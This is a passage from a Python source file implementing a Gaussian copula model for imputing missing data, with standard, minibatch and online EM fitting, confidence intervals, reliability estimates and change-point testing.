elif training_mode == 'standard':
pass
else:
print("Invalida training_mode, must be one of 'standard', 'minibatch-offline', 'minibatch-online'")
raise
self._training_mode = training_mode
self._batch_size = batch_size
self._window_size = window_size
self._realtime_marginal = realtime_marginal
self._decay = decay
self._corr_diff_type = corr_diff_type
# self._cont_indices and self._ord_indices store boolean indexing
self._cont_indices = None
self._ord_indices = None
# self.cont_indices and self.ord_indices store integer indexing
self.cont_indices = None
self.ord_indices = None
self._min_ord_ratio = min_ord_ratio
self.var_type_dict = {}
self._seed = random_state
self._rng = np.random.default_rng(self._seed)
self._sample_seed = self._seed
self._threshold = tol
self._max_iter = max_iter
self._max_workers = n_jobs
self._verbose = verbose
self._num_ord_updates = num_ord_updates
self._num_pass = num_pass
self._iter = 0
# model parameter
self._corr = None
# attributes
self.n_iter_ = 0
self.likelihood = []
self.features_names = None
self.corrupdate = []
self.corr_diff = defaultdict(list)
################################################
#### public functions
################################################
def fit(self, X,
continuous = None,
ordinal = None,
lower_truncated= None,
upper_truncated = None,
twosided_truncated = None,
**kwargs):
'''
Fits the Gaussian copula imputer on the input data X.
Parameters
----------
X: array-like of shape (n_samples, n_features)
Input data
        continuous, ordinal, lower_truncated, upper_truncated, twosided_truncated: list of integers
list of the corresponding variable type indices
kwargs:
additional keyword arguments for fit_offline:
first_fit: bool, default=True
If true, initialize the copula correlation matrix
max_iter: int or None.
The used maximum number of iterations is self._max_iter if max_iter is None else max_iter
convergence_verbose: bool, default = True
Output convergence information if True
'''
self.store_var_type(continuous = continuous,
ordinal = ordinal,
lower_truncated = lower_truncated,
upper_truncated = upper_truncated,
twosided_truncated = twosided_truncated
)
if self._training_mode == 'minibatch-online':
print('fit method is not implemented for minibatch-online mode, since the fitting and imputation are done in the unit of mini-batch. To impute the missing entries, call fit_transform.')
raise
else:
self.fit_offline(X, **kwargs)
def transform(self, X=None, num_ord_updates=2):
'''
Impute the missing entries in X using currently fitted model (accessed through self._corr).
Parameters
----------
X: array-like of shape (n_samples, n_features) or None
Data to be imputed. If None, set X as the data used to fit the model.
num_ord_updates: int, default=2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
Returns
-------
X_imp: array-like of shape (n_samples, n_features)
            The imputed complete dataset
'''
# get Z
if X is None:
Z = self._latent_Zimp
else:
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent(X_to_transform=X)
Z, _ = self._fillup_latent(Z=Z, Z_ord_lower=Z_ord_lower, Z_ord_upper=Z_ord_upper, num_ord_updates=num_ord_updates)
# from Z to X
X_imp = self._latent_to_imp(Z=Z, X_to_impute=X)
return X_imp
def fit_transform(self, X,
continuous = None,
ordinal = None,
lower_truncated= None,
upper_truncated = None,
twosided_truncated = None,
**kwargs
):
'''
Fit to data, then transform it.
        For 'minibatch-online' mode, the variable types are set in this function call since the fitting and transformation are done in an alternating fashion.
For the other two modes, the variable types are set in the function fit_offline.
Parameters
----------
X: array-like of shape (n_samples, n_features)
Input data
        continuous, ordinal, lower_truncated, upper_truncated, twosided_truncated: list of integers
list of the corresponding variable type indices
kwargs:
additional keyword arguments for fit_transform_online and fit_offline
Keyword arguments of fit_transform_online:
X_true: array-like of shape (n_samples, n_features) or None
If not None, it indicates that some (could be all) of the missing entries of X_batch are revealed,
and stored in X_true, after the imputation of X_batch. Those observation entries will be used to
update the model.
                n_train: int, default=0
The number of rows to be used to initialize the model estimation.
Use self._batch_size if n_train is 0
For keyword arguments of fit_offline, see Parameters of fit()
Returns
-------
X_imp: array-like of shape (n_samples, n_features)
            The imputed complete dataset
'''
self.store_var_type(continuous = continuous,
ordinal = ordinal,
lower_truncated = lower_truncated,
upper_truncated = upper_truncated,
twosided_truncated = twosided_truncated
)
if self._training_mode == 'minibatch-online':
X = self._preprocess_data(X, set_indices=False)
if 'X_true' in kwargs:
self.set_indices(np.asarray(kwargs['X_true']))
else:
self.set_indices(X)
kwargs_online = {name:kwargs[name] for name in ['n_train', 'X_true'] if name in kwargs}
X_imp = self.fit_transform_online(X, **kwargs_online)
else:
X = self._preprocess_data(X)
kwargs_offline = {name:kwargs[name] for name in ['first_fit', 'max_iter', 'convergence_verbose'] if name in kwargs}
X_imp = self.fit_transform_offline(X, **kwargs_offline)
return X_imp
def fit_transform_evaluate(self, X, eval_func=None, num_iter=30, return_Ximp=False, **kwargs):
'''
Run the algorithm for num_iter iterations and evaluate the returned imputed sample at each iteration.
Parameters
----------
X: array-like of shape (n_samples, n_features)
Data to be imputed.
eval_func: function that takes array-like of shape (n_samples, n_features) input
If not None, apply eval_func to the imputed dataset after each iteration and return the results.
num_iter: int, default = 30
The number of iterations to run.
return_Ximp: bool, default = False
If True, return the imputed datasets after each iteration.
kwargs:
additional keyword arguments for fit_transform_online and fit_offline
See Parameters of fit_transform()
Returns
-------
out: dict
'X_imp': the imputed datasets
            'evaluation': the desired evaluation on imputed datasets
'''
out = defaultdict(list)
# first fit
Ximp = self.fit_transform(X = X, max_iter = 1, convergence_verbose = False, **kwargs)
if eval_func is not None:
out['evaluation'].append(eval_func(Ximp))
if return_Ximp:
out['X_imp'].append(Ximp)
# subsequent fits
for i in range(1, num_iter, 1):
Ximp = self.fit_transform(X = X, max_iter = 1, first_fit = False, convergence_verbose = False)
if eval_func is not None:
out['evaluation'].append(eval_func(Ximp))
if return_Ximp:
out['X_imp'].append(Ximp)
return out
def get_params(self):
'''
Get parameters for this estimator.
Returns:
params: dict
'''
params = {'copula_corr': self._corr.copy()}
return params
def get_vartypes(self, feature_names=None):
'''
Return the variable types used during the model fitting. Each variable is one of the following:
'continuous', 'ordinal', 'lower_truncated', 'upper_truncated', 'twosided_truncated'
Parameters
----------
feature_names: list of str or None
If not None, feature_names will be used to name variables
Returns
-------
_var_types: dict
Keys: 'continuous', 'ordinal', 'lower_truncated', 'upper_truncated', 'twosided_truncated'
'''
_var_types = self.var_type_dict.copy()
if feature_names is not None:
names = list(feature_names)
for key,value in _var_types.items():
_var_types[key] = [names[i] for i in value]
for name in var_type_names:
if name not in _var_types:
_var_types[name] = []
return _var_types
def get_imputed_confidence_interval(self, X=None, alpha = 0.95, num_ord_updates=2, type='analytical', **kwargs):
'''
Compute the confidence interval for each imputed entry.
Parameters
----------
X: array-like of shape (n_samples, n_features) or None
Data to be imputed. If None, set X as the data used to fit the model.
alpha: float in (0,1), default = 0.95
            The desired confidence level.
num_ord_updates: int, default = 2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
        type: {'analytical', 'quantile'}, default='analytical'.
            'analytical': derive the analytical confidence interval
            'quantile': first do multiple imputation and then derive empirical quantile confidence intervals
kwargs:
additional keyword arguments for get_imputed_confidence_interval_quantiles
Returns
-------
out: dict with keys
'upper': array-like of shape (n_samples, n_features)
The upper bound of the confidence interval
'lower': array-like of shape (n_samples, n_features)
The lower bound of the confidence interval
'''
if self._training_mode == 'minibatch-online':
            raise NotImplementedError('Confidence interval is not yet supported for minibatch-online mode')
if type == 'quantile':
return self.get_imputed_confidence_interval_quantile(X=X, alpha=alpha, num_ord_updates=num_ord_updates, **kwargs)
if X is None:
Zimp = self._latent_Zimp
Cord = self._latent_Cord
X = self.transform_function.X
else:
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent(X_to_transform=X)
Zimp, Cord = self._fillup_latent(Z=Z, Z_ord_lower=Z_ord_lower, Z_ord_upper=Z_ord_upper, num_ord_updates=num_ord_updates)
n, p = Zimp.shape
margin = norm.ppf(1-(1-alpha)/2)
        # upper and lower have np.nan at observed locations because std_cond has np.nan at those locations
std_cond = self._get_cond_std_missing(X=X, Cord=Cord)
upper = Zimp + margin * std_cond
lower = Zimp - margin * std_cond
# monotonic transformation
upper = self._latent_to_imp(Z=upper, X_to_impute=X)
lower = self._latent_to_imp(Z=lower, X_to_impute=X)
obs_loc = ~np.isnan(X)
upper[obs_loc] = np.nan
lower[obs_loc] = np.nan
out = {'upper':upper, 'lower':lower}
return out
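    # e.g. (illustrative, after fitting): ct = model.get_imputed_confidence_interval(alpha=0.95);
    # ct['lower'] / ct['upper'] bound each imputed entry, and observed entries are np.nan.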
def sample_imputation(self, X=None, num=5, num_ord_updates=1):
'''
Sample multiple imputed datasets using the currently fitted method.
Parameters
----------
X: array of shape (n_samples, n_features) or None.
            The dataset to be imputed. If None, use the data seen during model fitting.
num: int, default=5
The number of imputation samples to draw.
num_ord_updates: int, default=1
The number of iterations to perform for estimating latent mean at ordinals.
Return
------
X_imp_num: array of shape (n_samples, n_features, num)
Imputed dataset.
'''
if X is None:
X = self.transform_function.X
if all(self._cont_indices):
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent(X_to_transform=X)
Z_imp_num = self._sample_latent(Z=Z, Z_ord_lower=Z_ord_lower, Z_ord_upper=Z_ord_upper, num=num, num_ord_updates=num_ord_updates)
X_imp_num = np.zeros_like(Z_imp_num)
for i in range(num):
X_imp_num[...,i] = self._latent_to_imp(Z=Z_imp_num[...,i], X_to_impute=X)
else:
# slower
n, p = X.shape
X_imp_num = np.empty((n, p, num))
Z_cont = self.transform_function.get_cont_latent(X_to_transform=X)
for i in range(num):
# Z_ord_lower and Z_ord_upper will be different across i
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent(X_to_transform=X, Z_cont=Z_cont, method='sampling')
# TODO: complete Z
Z_imp = self._sample_latent(Z=Z, Z_ord_lower=Z_ord_lower, Z_ord_upper=Z_ord_upper, num=1, num_ord_updates=num_ord_updates)
X_imp_num[...,i] = self._latent_to_imp(Z=Z_imp[...,0], X_to_impute=X)
return X_imp_num
def get_reliability(self, Ximp=None, alpha=0.95):
'''
Get the reliability of imputed entries. The notion of reliability is a relative quantity across all imputed entries.
Entries with higher reliability are more likely to have small imputation error.
Parameters
----------
Ximp: array-like of shape (n_samples, n_features) or None
Only used for all continuous variables.
The returned Gaussian copula imputed matrix.
alpha: float in (0,1), default = 0.95
            The desired confidence level.
Returns
-------
r: array-like of shape (n_samples, n_features)
Elementwise reliability
'''
if all(self._cont_indices):
r = self.get_reliability_cont(Ximp, alpha)
elif all(self._ord_indices):
r = self.get_reliability_ord()
else:
raise ValueError('Reliability computation is only available for either all continuous variables or all ordinal variables')
return r
def fit_change_point_test(self, X, X_true=None, n_train=0, nsamples=100, verbose=False):
'''
Conduct change point detection after receiving each data batch.
Parameters
----------
X: array-like of shape (n_samples, n_features)
Input data
X_true: array-like of shape (n_samples, n_features) or None
If not None, it indicates that some (could be all) of the missing entries of X_batch are revealed,
and stored in X_true, after the imputation of X_batch. Those observation entries will be used to
update the model.
        n_train: int, default=0
The number of rows to be used to initialize the model estimation.
Use self._batch_size if n_train is 0
        nsamples: int, default=100
The number of samples to draw for the resampling test
        verbose: bool, default=False
            If True, print progress information
Returns
-------
out: dict with keys
            pval: dict of lists
                keys are the norms in self._corr_diff_type,
                values are the corresponding empirical p-values
            statistics: dict of lists
                keys are the norms in self._corr_diff_type,
                values are the corresponding test statistics
'''
assert self._training_mode == 'minibatch-online'
if X_true is None:
X = self._preprocess_data(X)
else:
X = self._preprocess_data(X, set_indices=False)
self.set_indices(np.asarray(X_true))
cdf_types, inverse_cdf_types = self.get_cdf_estimation_type(p = X.shape[1])
self.transform_function = OnlineTransformFunction(self._cont_indices,
self._ord_indices,
window_size=self._window_size,
decay = self._decay,
cdf_types=cdf_types,
inverse_cdf_types=inverse_cdf_types
)
n,p = X.shape
self._corr = np.identity(p)
# initialize the model
n_train = self._batch_size if n_train == 0 else n_train
assert n_train > 0
ind_train = np.arange(n_train)
X_train = X[ind_train] if X_true is None else X_true[ind_train]
self.transform_function.update_window(X_train)
_ = self.partial_fit(X_batch = X_train, step_size=1)
pvals = defaultdict(list)
test_stats = defaultdict(list)
i=0
while True:
batch_lower = n_train + i*self._batch_size
batch_upper = min(n_train + (i+1)*self._batch_size, n)
if batch_lower>=n:
break
if verbose:
print(f'start batch {i+1}')
indices = np.arange(batch_lower, batch_upper, 1)
_X_true = None if X_true is None else X_true[indices]
_pval, _diff = self.change_point_test(X[indices,:], X_true=_X_true, step_size=self.stepsize(i+1), nsamples=nsamples)
for t in self._corr_diff_type:
pvals[t].append(_pval[t])
test_stats[t].append(_diff[t])
i+=1
out = {'pval':pvals, 'statistics':test_stats}
return out
####################################
#### General nonpublic functions
###################################
def get_imputed_confidence_interval_quantile(self, X=None, alpha = 0.95, num_ord_updates=1, num=200):
'''
Compute the confidence interval for each imputed entry.
Parameters
----------
X, alpha:
see Parameters in get_imputed_confidence_interval
num_ord_updates: int, default = 1
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
num: int, default=200
Number of multiple samples to draw
Returns
-------
out:
see Returns in get_imputed_confidence_interval
'''
if X is None:
X = self.transform_function.X
X_imp_num = self.sample_imputation(X = X, num = num, num_ord_updates = num_ord_updates)
q_lower, q_upper = (1-alpha)/2, 1-(1-alpha)/2
lower, upper = np.quantile(X_imp_num, [q_lower, q_upper], axis=2)
obs_loc = ~np.isnan(X)
upper[obs_loc] = np.nan
lower[obs_loc] = np.nan
return {'upper':upper, 'lower':lower}
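# Sketch of the quantile-based interval above (a restatement with hypothetical
# names, not new behaviour): `num` imputations are drawn per missing entry and
# the empirical (1-alpha)/2 and 1-(1-alpha)/2 quantiles across draws form the
# interval; observed entries are set to np.nan.
#   ci = model.get_imputed_confidence_interval_quantile(alpha=0.95, num=200)
#   width = ci['upper'] - ci['lower']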
def get_reliability_cont(self, Ximp, alpha=0.95):
'''
Implements get_reliability when all variables are continuous.
Parameters
----------
Ximp: array-like of shape (n_samples, n_features) or None
Only used for all continuous variables.
The returned Gaussian copula imputed matrix.
alpha: float in (0,1), default = 0.95
The desired significance level.
Returns
-------
reliability: array-like of shape (n_samples, n_features)
Elementwise reliability
'''
ct = self.get_imputed_confidence_interval(alpha = alpha)
d = ct['upper'] - ct['lower']
d_square, x_square = np.power(d,2), np.power(Ximp, 2)
missing_loc = np.isnan(self.transform_function.X)
# reliability has np.nan at observation locations because d has np.nan at those locations
reliability = (d_square[missing_loc].sum() - d_square) / (x_square[missing_loc].sum() - x_square)
return reliability
def get_reliability_ord(self):
'''
Implements get_reliability when all variables are ordinal.
Returns
-------
reliability: array-like of shape (n_samples, n_features)
Elementwise reliability
'''
std_cond = self._get_cond_std_missing()
try:
Zimp = self._latent_Zimp
except AttributeError:
print(f'Cannot compute reliability before model fitting and imputation')
raise
Z_ord_lower, _ = self.transform_function.get_ord_latent()
reliability = np.zeros_like(Zimp) + np.nan
p = Zimp.shape[1]
for j in range(p):
# get cutoffs
col = Z_ord_lower[:,j]
missing_indices = np.isnan(col)
cuts = np.unique(col[~missing_indices])
cuts = cuts[np.isfinite(cuts)]
# compute reliability/the probability lower bound
for i,x in enumerate(missing_indices):
if x:
t = np.abs(Zimp[i,j] - cuts).min()
reliability[i,j] = 1 - np.power(std_cond[i,j]/t, 2)
return reliability
################################################
#### offline functions
################################################
def fit_transform_offline(self, X, **kwargs):
'''
Implement fit_transform when the training mode is 'standard' or 'minibatch-offline'
Parameters
----------
See Parameters of fit()
Returns
-------
See Returns of transform()
'''
self.fit_offline(X, **kwargs)
X_imp = self.transform()
return X_imp
def fit_offline(self, X, first_fit=True, max_iter=None, convergence_verbose=True, fit_cov=True):
'''
Implement fit when the training mode is 'standard' or 'minibatch-offline'
Parameters
----------
See Parameters of fit()
'''
X = self._preprocess_data(X)
# do marginal estimation
# for every fit, a brand new marginal transformation is used
if first_fit:
cdf_types, inverse_cdf_types = self.get_cdf_estimation_type(p = X.shape[1])
self.transform_function = TransformFunction(X,
cont_indices=self._cont_indices,
ord_indices=self._ord_indices,
cdf_types=cdf_types,
inverse_cdf_types=inverse_cdf_types
)
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent()
else:
Z_ord_lower, Z_ord_upper = self._Z_ord_lower, self._Z_ord_upper
Z = self._latent_Zimp.copy()
Z[np.isnan(X)] = np.nan
# estimate copula correlation matrix
if fit_cov:
Z_imp, C_ord = self._fit_covariance(Z, Z_ord_lower, Z_ord_upper,
first_fit=first_fit, max_iter=max_iter, convergence_verbose=convergence_verbose)
# attributes to store after model fitting
self._latent_Zimp = Z_imp
self._latent_Cord = C_ord
# attributes to store for additional training
self._Z_ord_lower = Z_ord_lower
self._Z_ord_upper = Z_ord_upper
################################################
#### online functions
################################################
def fit_transform_online(self, X, X_true=None, n_train=0):
'''
Implement fit_transform when the training mode is 'minibatch-online'
Parameters
----------
See Parameters of fit_transform()
Returns
-------
See Returns of transform()
'''
if X_true is not None:
X_true = np.array(X_true)
cdf_types, inverse_cdf_types = self.get_cdf_estimation_type(p = X.shape[1])
self.transform_function = OnlineTransformFunction(self._cont_indices,
self._ord_indices,
window_size=self._window_size,
decay = self._decay,
cdf_types=cdf_types,
inverse_cdf_types=inverse_cdf_types
)
n,p = X.shape
X_imp = np.zeros_like(X)
self._corr = np.identity(p)
# initialize the model
n_train = self._batch_size if n_train == 0 else n_train
assert n_train > 0
ind_train = np.arange(n_train)
X_train = X[ind_train] if X_true is None else X_true[ind_train]
self.transform_function.update_window(X_train)
_ = self.partial_fit(X_batch = X_train, step_size=1)
X_imp[ind_train] = self.transform(X = X_train, num_ord_updates=self._num_ord_updates)
i=0
while True:
batch_lower = n_train + i*self._batch_size
batch_upper = min(n_train + (i+1)*self._batch_size, n)
if batch_lower>=n:
break
indices = np.arange(batch_lower, batch_upper, 1)
_X_true = None if X_true is None else X_true[indices]
X_imp[indices] = self.partial_fit_transform(X[indices], step_size=self.stepsize(i+1), X_true=_X_true)
i+=1
if self._verbose > 0:
print(f'finish batch {i}')
return X_imp
def partial_fit_transform(self, X_batch, step_size=0.5, X_true=None):
"""
Updates the fit of the copula using the data in X_batch and returns the
imputed values and the new correlation for the copula
Parameters
----------
X_batch: array-like of shape (nbatch, nfeatures)
data matrix with entries to use to update copula and be imputed
step_size: float in (0,1), default=0.5
tunes how much to weight new covariance estimates
X_true:
If not None, it indicates that some (could be all) of the missing entries of X_batch are revealed,
and stored in X_true, after the imputation of X_batch. Those observation entries will be used to
update the model.
Returns
-------
X_imp: array-like of shape (nbatch, nfeatures)
X_batch with missing values imputed
"""
# impute missing entries in new data using previously fitted model
# just a step of out-of-sample imputation
X_for_update = X_batch if X_true is None else X_true
if self._realtime_marginal:
X_imp = X_batch.copy()
for i,x in enumerate(X_batch):
X_imp[i] = self.transform(X = x.reshape((1, -1)), num_ord_updates = self._num_ord_updates)
self.transform_function.update_window(X_for_update[i].reshape((1, -1)))
else:
X_imp = self.transform(X = X_batch, num_ord_updates=self._num_ord_updates)
self.transform_function.update_window(X_for_update)
# use new model to update model parameters
prev_corr = self._corr.copy()
new_corr = self.partial_fit(X_batch=X_for_update, step_size=step_size, model_update=True)
diff = self.get_matrix_diff(prev_corr, self._corr, self._corr_diff_type)
self._update_corr_diff(diff)
return X_imp
def partial_fit(self, X_batch, step_size=0.5, model_update=True):
'''
Update the copula correlation from new samples in X_batch, with given step size
Parameters
----------
X_batch: array-like of shape (nbatch, nfeatures)
data matrix with entries to use to update copula
step_size: float in (0,1), default=0.5
tunes how much to weight new covariance estimates
model_update: bool, default=True
If True, update fitting information
Returns
-------
new_corr: array-like of shape (nfeatures, nfeatures)
updated copula correlation
'''
Z_ord_lower, Z_ord_upper = self.transform_function.get_ord_latent(X_to_transform=X_batch)
Z_ord = self._init_Z_ord(Z_ord_lower, Z_ord_upper, method='univariate_mean')
Z_cont = self.transform_function.get_cont_latent(X_to_transform=X_batch)
Z = np.empty_like(X_batch)
Z[:, self._cont_indices] = Z_cont
Z[:, self._ord_indices] = Z_ord
corr, Z_imp, Z, C_ord, loglik = self._em_step(Z, Z_ord_lower, Z_ord_upper)
new_corr = corr*step_size + (1-step_size)*self._corr
if model_update:
self._corr = new_corr
self._latent_Zimp = Z_imp
self._latent_Cord = C_ord
self.likelihood.append(loglik)
return new_corr
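# Minimal sketch of the online update above (hypothetical names `model`,
# `X_new`): the copula correlation moves toward the batch EM estimate by a
# convex combination weighted by step_size.
#   corr_new = model.partial_fit(X_batch=X_new, step_size=0.3)
#   # corr_new = 0.3 * corr_batch + 0.7 * corr_previous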
def change_point_test(self, X, step_size, X_true=None, nsamples=100):
'''
Conduct change point test at the newly received data batch X
Parameters
----------
X: array-like of shape (nbatch, nfeatures)
The newly received (incomplete) data batch
X_true: array-like of shape (nbatch, nfeatures)
A matrix that agrees with X at observed entries but has fewer missing entries.
step_size: float in (0,1)
The correlation update step size
nsamples: int, default = 100
The number of samples to draw for approximating the null distribution.
Returns
-------
pval: float
empirical p-value
diff: float
test statistics
'''
n,p = X.shape
missing_indices = np.isnan(X)
prev_corr = self._corr.copy()
changing_stat = defaultdict(list)
X_to_impute = np.zeros_like(X) * np.nan
for i in range(nsamples):
z = self._rng.multivariate_normal(np.zeros(p), prev_corr, n)
# mask
x = np.empty((n,p))
x[:,self.cont_indices] = self.transform_function.impute_cont_observed(z, X_to_impute)
x[:,self.ord_indices] = self.transform_function.impute_ord_observed(z, X_to_impute)
x[missing_indices] = np.nan
# TODO: compare with enabling marginal_update
new_corr = self.partial_fit(x, step_size=step_size, model_update=False)
diff = self.get_matrix_diff(prev_corr, new_corr, self._corr_diff_type)
self._update_corr_diff(diff, output=changing_stat)
self.transform_function.update_window(X)
new_corr = self.partial_fit(X, step_size=step_size, model_update=True)
diff = self.get_matrix_diff(prev_corr, new_corr, self._corr_diff_type)
self._update_corr_diff(diff)
# compute empirical p-values
changing_stat = pd.DataFrame(changing_stat)
pval = {}
for t in self._corr_diff_type:
pval[t] = (np.sum(diff[t]<changing_stat[t])+1)/(nsamples+1)
return pval, diff
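# Note on the p-value above (a restatement, not new behaviour): the observed
# statistic is compared against `nsamples` statistics simulated from the model
# fitted before this batch, and the add-one empirical p-value
#   p = (#{simulated statistic > observed} + 1) / (nsamples + 1)
# is reported for each matrix-norm type in self._corr_diff_type.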
################################################
#### core functions
################################################
def _latent_to_imp(self, Z, X_to_impute=None):
'''
Transform the complete latent matrix Z to the observed space, but only keep values at missing entries (to be imputed).
All values at observed entries will be replaced with the original observations in X_to_impute.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
A complete matrix in latent Gaussian space
X_to_impute: array-like of shape (nsamples, nfeatures) or None
If None, self.transform_function.X will be used.
Returns
-------
X_imp: array-like of shape (nsamples, nfeatures)
The transformed complete matrix in the observed space
'''
# During the fitting process, all ordinal columns are moved to appear before all continuous columns
# Rearrange the obtained results to go back to the original data ordering
if X_to_impute is None:
X_to_impute = self.transform_function.X
X_imp = X_to_impute.copy()
if any(self._cont_indices):
X_imp[:,self._cont_indices] = self.transform_function.impute_cont_observed(Z=Z, X_to_impute=X_to_impute)
if any(self._ord_indices):
X_imp[:,self._ord_indices] = self.transform_function.impute_ord_observed(Z=Z, X_to_impute=X_to_impute)
return X_imp
def _observed_to_latent(self, X_to_transform=None, Z_cont=None, method='univariate_mean'):
'''
Transform incomplete/complete data matrix X_to_transform to the latent Gaussian space.
Parameters
----------
X_to_transform: array-like of shape (nsamples, nfeatures) or None
If None, self.transform_function.X will be used.
Z_cont: array-like of shape (nsamples, nfeatures_cont)
The continuous-variable submatrix of the desired transformed latent matrix.
Use with caution: it is only intended to avoid repeatedly recomputing Z_cont.
Returns
-------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
'''
if X_to_transform is None:
X_to_transform = self.transform_function.X
if Z_cont is None:
Z_cont = self.transform_function.get_cont_latent(X_to_transform=X_to_transform)
Z_ord_lower, Z_ord_upper = self.transform_function.get_ord_latent(X_to_transform=X_to_transform)
Z_ord = self._init_Z_ord(Z_ord_lower, Z_ord_upper, method=method)
# Z = np.concatenate((Z_ord, Z_cont), axis=1)
Z = np.empty_like(X_to_transform)
Z[:, self.cont_indices] = Z_cont
Z[:, self.ord_indices] = Z_ord
return Z, Z_ord_lower, Z_ord_upper
def _fit_covariance(self, Z, Z_ord_lower, Z_ord_upper, first_fit=True, max_iter=None, convergence_verbose=True):
"""
Fits the gaussian copula correlation matrix using only the transformed data in the latent space.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
first_fit: bool, default=True
if True, initialize the copula correlation matrix.
max_iter: int or None
The maximum number of iterations to run. If None, use self,_max_iter.
convergence_verbose: bool, default=True
If True, store self.n_iter_ as the number of iterations run
Returns
-------
Z_imp: array-like of shape (nsamples,nfeatures)
The completed matrix in the latent Gaussian space.
C_ord: array-like of shape (nfeatures, nfeatures)
The conditional covariance due to ordinal truncation.
"""
if first_fit:
self._init_copula_corr(Z)
n = len(Z)
# permutation of indices of data for stochastic fitting
if self._training_mode=='minibatch-offline':
training_permutation = self._rng.permutation(n)
# determine the maximal number of iterations to run
if self._training_mode=='minibatch-offline' and self._num_pass is not None:
max_iter = (np.ceil(n/self._batch_size) * self._num_pass).astype(np.int32)
if self._verbose>0:
print(f'The number of maximum iteration is set as {max_iter} to have {self._num_pass} passes over all data')
else:
max_iter = self._max_iter if max_iter is None else max_iter
converged = False
Z_imp = np.empty_like(Z)
for i in range(max_iter):
# track the change ratio of copula correlation as stopping criterion
prev_corr = self._corr
if np.isnan(prev_corr).any():
raise ValueError(f'Unexpected nan in updated copula correlation at iteration {i}')
# run EM iterations
if self._training_mode == 'standard':
# standard EM: each iteration uses all data points
corr, Z_imp, Z, C_ord, iterloglik = self._em_step(Z, Z_ord_lower, Z_ord_upper)
self._corr = corr
else:
# mini-batch EM: more frequent parameter update by using data input with smaller size at each iteration
batch_lower = (i * self._batch_size) % n
batch_upper = ((i+1) * self._batch_size) % n
if batch_upper < batch_lower:
# we have wrapped around the dataset
indices = np.concatenate((training_permutation[batch_lower:], training_permutation[:batch_upper]))
else:
indices = training_permutation[batch_lower:batch_upper]
corr, Z_imp_batch, Z_batch, C_ord, iterloglik = self._em_step(Z[indices], Z_ord_lower[indices], Z_ord_upper[indices])
Z_imp[indices] = Z_imp_batch
Z[indices] = Z_batch
step_size = self.stepsize(i+1)
self._corr = corr*step_size + (1 - step_size)*prev_corr
self._iter += 1
# stop if the change in the correlation estimation is below the threshold
corr_update = self._get_scaled_diff(prev_corr, self._corr)
self.corrupdate.append(corr_update)
if self._verbose>0:
print(f"Iter {self._iter}: copula parameter change {corr_update:.4f}, likelihood {iterloglik:.4f}")
# append new likelihood
self.likelihood.append(iterloglik)
if corr_update < self._threshold:
converged = True
if converged:
break
# store the number of iterations and print if converged
if convergence_verbose:
self._set_n_iter(converged, i)
return Z_imp, C_ord
def _em_step(self, Z, r_lower, r_upper):
"""
Executes one step of the EM algorithm to update the covariance
of the copula
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
Returns
-------
sigma: array-like of shape (nfeatures, nfeatures)
an estimate of the covariance of the copula
Z_imp: array-like of shape (nsamples,nfeatures)
The completed matrix in the latent Gaussian space.
C_ord: array-like of shape (nfeatures, nfeatures)
The conditional covariance due to ordinal truncation.
loglik: float
The computed log-likelihood
"""
n,p = Z.shape
assert n>0, 'EM step receives empty input'
max_workers = self._max_workers
num_ord_updates = self._num_ord_updates
out_dict = {}
out_dict['var_ordinal'] = np.zeros((n,p))
out_dict['Z_imp'] = Z.copy()
out_dict['Z'] = Z
out_dict['loglik'] = 0
out_dict['C'] = np.zeros((p,p))
has_truncation = self.has_truncation()
if max_workers ==1:
args = ('em', Z, r_lower, r_upper, self._corr, num_ord_updates, self._ord_indices, has_truncation)
res_dict = _latent_operation_body_(args)
for key in ['Z_imp', 'Z', 'var_ordinal']:
out_dict[key] = res_dict[key]
for key in ['loglik', 'C']:
out_dict[key] += res_dict[key]/n
else:
divide = n/max_workers * np.arange(max_workers+1)
divide = divide.astype(int)
args = [('em',
Z[divide[i]:divide[i+1]].copy(),
r_lower[divide[i]:divide[i+1]],
r_upper[divide[i]:divide[i+1]],
self._corr,
num_ord_updates,
self._ord_indices,
has_truncation
) for i in range(max_workers)]
with ProcessPoolExecutor(max_workers=max_workers) as pool:
res = pool.map(_latent_operation_body_, args)
for i, res_dict in enumerate(res):
for key in ['Z_imp', 'Z', 'var_ordinal']:
out_dict[key][divide[i]:divide[i+1]] = res_dict[key]
for key in ['loglik', 'C']:
out_dict[key] += res_dict[key]/n
Z_imp = out_dict['Z_imp']
C = out_dict['C']
C_ord = out_dict['var_ordinal']
try:
# the estimated covariance converges to 1
# if n is large enough, an alternative update rule as below is also plausible
# >>> sigma = np.cov(Z_imp, rowvar=False) + C
# >>> np.fill_diagonal(sigma, 1)
# however, when n is small, the above update rule is not robust: the updated sigma may fail to be positive definite
# Consequently, it easily fails in minibatch and online training mode
# The current updating rule is more robust
sigma = np.cov(Z_imp, rowvar=False) + C
if self._verbose>=3:
_diag = np.diag(sigma)
_max, _min = _diag.max(), _diag.min()
print(f'The estimated covariance diagonal has min {_min:.3f} and max {_max:.3f}')
sigma = self._project_to_correlation(sigma)
except ZeroDivisionError:
print("unexpected zero covariance for the latent Z")
_min, _max = C.diagonal().min(), C.diagonal().max()
print(f'The diagonals of C ranges from min {_min} to max {_max}')
_m = np.cov(Z_imp, rowvar=False)
_min, _max = _m.diagonal().min(), _m.diagonal().max()
print(f'The diagonals of empirical covariance of Z_imp ranges from min {_min} to max {_max}')
idp = _m.diagonal() == _min
print(f'Min diagonal appears in {np.flatnonzero(idp)}-th variable with values:')
print(np.round(Z_imp[:,idp],4))
print(f'The fitted window is {self.transform_function.X[:,idp]}')
raise
loglik = out_dict['loglik']
return sigma, Z_imp, Z, C_ord, loglik
